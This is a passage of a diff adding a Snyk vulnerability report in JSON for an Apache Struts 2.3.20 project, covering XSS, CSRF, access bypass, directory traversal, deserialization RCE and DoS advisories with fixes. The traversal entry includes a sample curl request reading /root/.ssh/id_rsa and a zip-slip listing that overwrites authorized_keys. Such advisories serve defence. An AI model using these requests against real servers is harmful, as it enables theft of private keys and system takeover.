is sent to the vulnerable web site, which reflects the attack back to the user’s browser.| \r\n|**DOM-based**|Client|The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data.|\r\n|**Mutated**| |The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters.|\r\n\r\n### Affected environments\r\nThe following environments are susceptible to an XSS attack:\r\n\r\n* Web servers\r\n* Application servers\r\n* Web application environments\r\n\r\n### How to prevent\r\nThis section describes the top best practices designed to specifically protect your code: \r\n\r\n* Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches. \r\n* Convert special characters such as `?`, `&`, `/`, `<`, `>` and spaces to their respective HTML or URL encoded equivalents. \r\n* Give users the option to disable client-side scripts.\r\n* Redirect invalid requests.\r\n* Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.\r\n* Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.\r\n* Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.\n\n\n## References\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4003)", + "epssDetails": { + "percentile": "0.88699", + "probability": "0.01905", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4003" + ], + "CWE": [ + "CWE-79" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.353000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-03-16T06:52:13.014000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-03-16T06:52:13.014000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:54.345030Z", + "socialTrendAlert": false, + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.28" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30774", + "title": "Cross-site Request Forgery (CSRF)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.29)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-038.html", + "title": "Apache Struts Security Bulletin" + }, + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4430", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:46:55.023333Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:09.208211Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:55.023333Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Cross-site Request Forgery (CSRF). It mishandles token validation, which allows remote attackers to conduct CSRF attacks via unspecified vectors.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-038.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4430)\n", + "epssDetails": { + "percentile": "0.75315", + "probability": "0.00450", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4430" + ], + "CWE": [ + "CWE-352" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.364000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-20T07:00:37Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-20T07:00:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:55.023333Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30775", + "title": "Access Restriction Bypass", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.29)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://struts.apache.org/docs/s2-040.html", + "title": "Apache Struts Security Bulletin" + }, + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4431", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:55.000380Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:37.211840Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:55.000380Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks by leveraging a default method.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [Apache Struts Security Bulletin](https://struts.apache.org/docs/s2-040.html)\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4431)\n", + "epssDetails": { + "percentile": "0.83001", + "probability": "0.00914", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4431" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.377000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-21T04:49:27Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-21T04:49:27Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:55.000380Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30776", + "title": "Access Restriction Bypass", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20, 2.3.29)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.29" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e", + "title": "GitHub Commit" + }, + { + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433", + "title": "NVD" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:39.417349Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:52.478661Z" + } + ], + "description": "## Overview\n[org.apache.struts:struts2-core](https://github.com/apache/struts) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Access Restriction Bypass. It allows remote attackers to bypass intended access restrictions and conduct redirection attacks via a crafted request.\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.29 or higher.\n## References\n- [GitHub Commit](https://github.com/apache/struts/commit/b28b78c062f0bf3c79793a25aab8c9b6c12bce6e)\n- [NVD](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4433)\n", + "epssDetails": { + "percentile": "0.77304", + "probability": "0.00531", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-4433" + ], + "CWE": [ + "CWE-20" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.390000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-06-21T01:33:07Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-06-21T01:33:07Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:46:52.478661Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.29" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-30778", + "title": "Directory Traversal", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Takeshi Terada" + ], + "semver": { + "vulnerable": [ + "[2.3.20,2.3.31)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.31" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "critical", + "cvssScore": 9.8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "http://struts.apache.org/docs/s2-042.html", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/struts/commit/030ffa33543f8953306ed0c0dc815c7fb74d7129", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/8e67b9144aa643769b261e2492cb561e04d016ab", + "title": "GitHub Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:03.921305Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:32.508677Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:03.921305Z" + } + ], + "description": "## Overview\n[`org.apache.struts:struts2-core`](http://search.maven.org/#search%7Cga%7C1%7Ca%3A%22struts2-core%22)\nAffected versions of the package are vulnerable to Directory Traversal.\n\n## Details\nA Directory Traversal attack (also known as path traversal) aims to access files and directories that are stored outside the intended folder. By manipulating files with \"dot-dot-slash (../)\" sequences and its variations, or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system, including application source code, configuration, and other critical system files.\r\n\r\nDirectory Traversal vulnerabilities can be generally divided into two types:\r\n\r\n- **Information Disclosure**: Allows the attacker to gain information about the folder structure or read the contents of sensitive files on the system.\r\n\r\n`st` is a module for serving static files on web pages, and contains a [vulnerability of this type](https://snyk.io/vuln/npm:st:20140206). In our example, we will serve files from the `public` route.\r\n\r\nIf an attacker requests the following URL from our server, it will in turn leak the sensitive private key of the root user.\r\n\r\n```\r\ncurl http://localhost:8080/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/root/.ssh/id_rsa\r\n```\r\n**Note** `%2e` is the URL encoded version of `.` (dot).\r\n\r\n- **Writing arbitrary files**: Allows the attacker to create or replace existing files. This type of vulnerability is also known as `Zip-Slip`. \r\n\r\nOne way to achieve this is by using a malicious `zip` archive that holds path traversal filenames. When each filename in the zip archive gets concatenated to the target extraction folder, without validation, the final path ends up outside of the target folder. If an executable or a configuration file is overwritten with a file containing malicious code, the problem can turn into an arbitrary code execution issue quite easily.\r\n\r\nThe following is an example of a `zip` archive with one benign file and one malicious file. Extracting the malicious file will result in traversing out of the target folder, ending up in `/root/.ssh/` overwriting the `authorized_keys` file:\r\n\r\n```\r\n2018-04-15 22:04:29 ..... 19 19 good.txt\r\n2018-04-15 22:04:42 ..... 20 20 ../../../../../../root/.ssh/authorized_keys\r\n```\n\n\n## References\n- [Apache Security Advisory](http://struts.apache.org/docs/s2-042.html)\n", + "epssDetails": { + "percentile": "0.89019", + "probability": "0.02019", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2016-6795" + ], + "CWE": [ + "CWE-94" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-02-22T07:28:23.415000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2016-10-19T01:09:09.263000Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2016-10-19T01:09:09.263000Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:47:03.921305Z", + "socialTrendAlert": false, + "severityWithCritical": "critical", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.31" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31495", + "title": "Arbitrary Command Execution", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:R", + "credit": [ + "LGTM Security Team" + ], + "semver": { + "vulnerable": [ + "[,2.3.34)", + "[2.4,2.5.13)" + ] + }, + "exploit": "High", + "fixedIn": [ + "2.3.34", + "2.5.13" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://cwiki.apache.org/confluence/display/WW/S2-052", + "title": "Apache Security Bulletin" + }, + { + "url": "https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax", + "title": "Apache Struts Statement on Equifax Security Breach" + }, + { + "url": "https://www.exploit-db.com/exploits/42627", + "title": "Exploit DB" + }, + { + "url": "https://github.com/apache/struts/commit/19494718865f2fb7da5ea363de3822f87fbda26", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/6dd6e5cfb7b5e020abffe7e8091bd63fe97c10a", + "title": "GitHub Commit" + }, + { + "url": "https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement", + "title": "LGTM Advisory" + }, + { + "url": "https://lgtm.com/blog/apache_struts_CVE-2017-9805", + "title": "LGTM Vulnerability Details" + }, + { + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", + "title": "CISA - Known Exploited Vulnerabilities" + }, + { + "url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2017/CVE-2017-9805.yaml", + "title": "Nuclei Templates" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:47:48.667611Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:R", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:15.532569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.667611Z" + } + ], + "description": "## Overview\r\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\r\n\r\nThe REST Plugin in affected versions use a `XStreamHandler` with an instance of XStream for deserialization without any type filtering. By design, there are few limits to the type of objects XStream can handle. This flexibility comes at a price. The XML generated or consumed by XStream includes all information required to build Java objects of almost any type. The provided XML data is used by XStream to unmarshal Java objects. An attacker could use this flaw to execute arbitrary code or conduct further attacks.\r\n\r\n[A working exploit](https://github.com/rapid7/metasploit-framework/commit/5ea83fee5ee8c23ad95608b7e2022db5b48340ef) is publicly available and [is actively](https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/) exploited in the wild.\r\n\r\nYou can read more about this vulnerability [on our blog](https://snyk.io/blog/equifax-breach-vulnerable-open-source-libraries/).\r\n\r\n# Details\r\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker control the state or the flow of the execution. \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n- Apache Blog\r\n\r\n\r\n## Remediation\r\nDevelopers are strongly advised to upgrade their _Apache Struts_ components to version `2.3.34`, `2.5.13` or higher.\r\n\r\nIt is possible that some REST actions stop working because of applied default restrictions on available classes. In this case please investigate the new interfaces that were introduced to allow class restrictions per action, those interfaces are:\r\n* org.apache.struts2.rest.handler.AllowedClasses\r\n* org.apache.struts2.rest.handler.AllowedClassNames\r\n* org.apache.struts2.rest.handler.XStreamPermissionProvider\r\n\r\nIf for some reason upgrading is not an option, consider the following workarounds:\r\n1. Disable handling XML pages and requests to such pages\r\n```xml\r\n\r\n```\r\n\r\n2. Override getContentType in XStreamHandler\r\n```java\r\n public class MyXStreamHandler extends XStreamHandler { \r\n public String getContentType() {\r\n return \"not-existing-content-type-@;/&%$#@\";\r\n }\r\n }\r\n```\r\n\r\n3. Register the handler by overriding the one provided by the framework in your struts.xml\r\n```xml\r\n\r\n\r\n```\r\n\r\n## References\r\n- [LGTM Advisory](https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement)\r\n- [LGTM Vulnerability Details](https://lgtm.com/blog/apache_struts_CVE-2017-9805)\r\n- [Apache Struts Statement on Equifax Security Breach](https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax)\r\n- [Apache Security Bulletin](https://cwiki.apache.org/confluence/display/WW/S2-052)", + "epssDetails": { + "percentile": "0.99995", + "probability": "0.97541", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9805" + ], + "CWE": [ + "CWE-20", + "CWE-502" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-06T17:28:23.339000Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2017-09-05T17:28:23Z", + "exploitDetails": { + "sources": [ + "CISA", + "ExploitDB", + "Nuclei Templates", + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "High", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Attacked", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.apache.struts", + "artifactId": "struts2-core" + }, + "publicationTime": "2017-09-06T17:28:23Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-06-03T08:53:26.345481Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "org.apache.struts:struts2-core@2.3.20" + ], + "upgradePath": [ + false, + "org.apache.struts:struts2-core@2.3.34" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.apache.struts:struts2-core", + "version": "2.3.20" + }, + { + "id": "SNYK-JAVA-ORGAPACHESTRUTS-31500", + "title": "Denial of Service (DoS)", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "credit": [ + "Yasser Zamani" + ], + "semver": { + "vulnerable": [ + "[2.3.7,2.3.33)", + "[2.5,2.5.12)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.3.33", + "2.5.12" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.apache.struts:struts2-core", + "references": [ + { + "url": "https://lists.apache.org/thread.html/3795c4dd46d9ec75f4a6eb9eca11c11edd3e796c6c1fd7b17b5dc50d@%3Cannouncements.struts.apache.org%3E", + "title": "Apache Security Advisory" + }, + { + "url": "https://github.com/apache/struts/commit/086b63735527d4bb0c1dd0d86a7c0374b825ff2", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/apache/struts/commit/0d6442bab5b44d93c4c2e63c5335f0a331333b9", + "title": "GitHub Commit" + }, + { + "url": "http://struts.apache.org/docs/s2-049.html", + "title": "Struts Security Bulletin" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:51.213194Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:16.872773Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:51.213194Z" + } + ], + "description": "## Overview\n[Apache Struts2](http://struts.apache.org/) is a popular open-source framework for developing web applications in the Java programming language.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) attacks.\nWhen using a Spring AOP functionality to secure Struts actions it is possible to perform a DoS attack.\n\n\n## Details\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\r\n\r\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\r\n\r\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\r\n\r\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\r\n\r\nTwo common types of DoS vulnerabilities:\r\n\r\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\r\n\r\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](npm:ws:20171108)\n\n## Remediation\nUpgrade `org.apache.struts:struts2-core` to version 2.3.33, 2.5.12 or higher.\n\n## References\n- [Struts Security Bulletin](http://struts.apache.org/docs/s2-049.html)\n- [Struts Announcements Mailing List](https://lists.apache.org/thread.html/3795c4dd46d9ec75f4a6eb9eca11c11edd3e796c6c1fd7b17b5dc50d@%3Cannouncements.struts.apache.org%3E)\n", + "epssDetails": { + "percentile": "0.91602", + "probability": "0.03467", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2017-9787" + ], + "CWE": [ + "CWE-400" + ] + }, + "packageName": "org.apache.struts:struts2-core", + "proprietary": false, + "creationTime": "2017-09-12T12:47:32.905000Z", + "functions_new": [], + "alternativeIds": [], + 